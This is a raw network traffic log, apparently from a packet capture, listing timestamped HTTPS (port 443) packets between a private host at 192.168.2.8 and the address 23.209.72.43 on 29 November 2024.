Nov 29, 2024 12:28:10.425523996 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.425703049 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.425709963 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.425721884 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.425728083 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.425964117 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.425968885 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.425981045 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.427598953 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.452924967 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.453030109 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.453041077 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.453155994 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.453162909 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.453167915 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.453175068 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.453443050 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.453449011 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.453464031 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.453599930 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.469394922 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.469438076 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.469444036 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.469640017 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.469647884 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.469655037 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.470091105 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.470103025 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.470108986 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.470117092 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.470725060 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.491559982 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.491609097 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.491616011 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.491808891 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.491816044 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.491822958 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.491830111 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.492054939 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.492060900 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.492069006 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.492234945 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.511775970 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.511801004 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.511807919 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.511945009 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.511955976 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.512063980 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.512154102 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.512238979 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.512245893 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.512262106 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.512649059 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.533577919 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.533596992 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.533602953 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.533757925 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.533763885 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.533771038 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.533781052 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.533977032 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.534039974 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.534045935 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.534061909 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.539149046 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.554115057 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.554172993 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.554178953 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.554328918 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.554342031 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.554348946 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.554357052 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.554630995 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.554637909 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.554644108 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.554893970 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.575184107 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.575249910 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.575262070 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.575357914 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.575370073 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.575376034 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.575592041 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.575598001 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.575604916 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.575611115 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.575664997 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.581566095 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.608357906 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.608383894 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.608392954 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.608525038 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.608603954 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.608611107 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.608738899 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.608762026 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.608768940 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.614392042 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.615906000 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.615917921 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.615926027 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.616075039 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.616077900 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.616086960 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.616094112 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.616101980 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.616358042 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.616364002 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.616378069 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.616380930 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.616818905 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.617182970 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.638715982 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.638731003 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.638747931 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.638773918 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.638827085 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.638843060 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.638850927 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.638864040 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.639118910 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.639133930 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.639183998 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.641882896 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.658068895 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.658086061 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.658092976 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.658221960 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.658227921 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.658422947 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.695007086 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.695852041 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.846513987 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.970999002 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.971019030 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.975953102 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.977180004 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.977487087 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.977791071 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.977835894 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.977849007 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.978004932 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.978012085 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.978018999 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.978024960 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.978030920 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.980366945 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.980400085 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.980504036 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.981447935 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.981586933 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.981673002 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.982254028 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.982323885 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.982331991 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.982439041 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.982494116 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.982506037 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.982512951 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.982671022 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.982830048 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.982836962 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.982842922 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.982924938 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:10.983228922 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.992234945 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.992376089 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:10.992863894 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.014106989 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.014188051 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.014308929 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.014383078 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.014394999 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.014529943 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.014535904 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.014549017 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.014554977 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.014792919 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.014820099 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.022864103 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.028995991 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.029073954 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.029082060 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.029241085 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.029253006 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.029259920 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.029267073 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.029541969 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.029548883 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.029561996 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.030066967 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.037367105 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.037400007 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.037408113 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.037527084 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.037538052 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.042243004 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.076620102 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.082539082 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.082621098 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.082698107 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.082788944 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.082797050 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.082890034 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.083017111 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.083024979 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.083131075 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.083170891 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.083178043 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.083184958 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.083349943 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.097271919 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.097323895 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.097552061 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.097701073 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.097738028 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.097845078 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.097851992 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.097995996 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.098004103 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.098010063 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.098259926 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.105925083 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.105978012 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.105986118 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.106112957 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.106118917 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.106126070 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.106132030 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.106395006 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.106447935 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.106455088 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.106882095 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.120445013 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.120474100 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.120487928 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.120558977 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.120621920 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.120630026 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.120636940 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.120913982 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.120920897 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.120934963 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.121308088 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.146004915 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.146028042 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.146044970 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.146083117 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.146151066 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.146164894 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.146173000 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.146377087 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.146466017 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.198735952 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.319303989 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.325599909 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.326119900 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.329118013 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.329875946 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.330111027 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.330218077 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.330419064 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.330502987 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.330511093 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.330662012 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.330682039 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.330689907 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.330703974 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.330946922 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.330952883 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.332082033 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.334255934 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.342250109 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.342294931 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.342302084 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.342452049 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.342458010 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.342473030 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.342643023 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.342677116 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.342689037 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.342691898 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.342696905 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.342874050 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.352248907 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.352298021 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.352304935 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.352437973 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.352495909 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.352503061 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.352509022 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.355864048 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.361167908 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.361371040 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.361428022 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.361562014 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.361632109 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.361639977 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.361783028 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.361794949 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.361804008 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.362024069 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.362031937 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.371265888 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.371826887 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.371994019 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.372626066 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.372641087 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.372750044 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.372761965 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.372981071 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.372987986 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.372994900 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.373004913 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.373270035 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.373276949 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.373439074 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.375457048 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.384056091 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.384094000 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.384100914 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.384229898 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.384284973 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.384291887 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.384305000 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.384563923 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.384569883 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.384577036 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.384743929 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.387262106 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.395698071 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.395761013 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.395767927 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.395903111 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.395940065 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.395956039 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.395962954 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.396167040 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.412745953 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.443773985 CET	443	62648	23.209.72.43	192.168.2.8
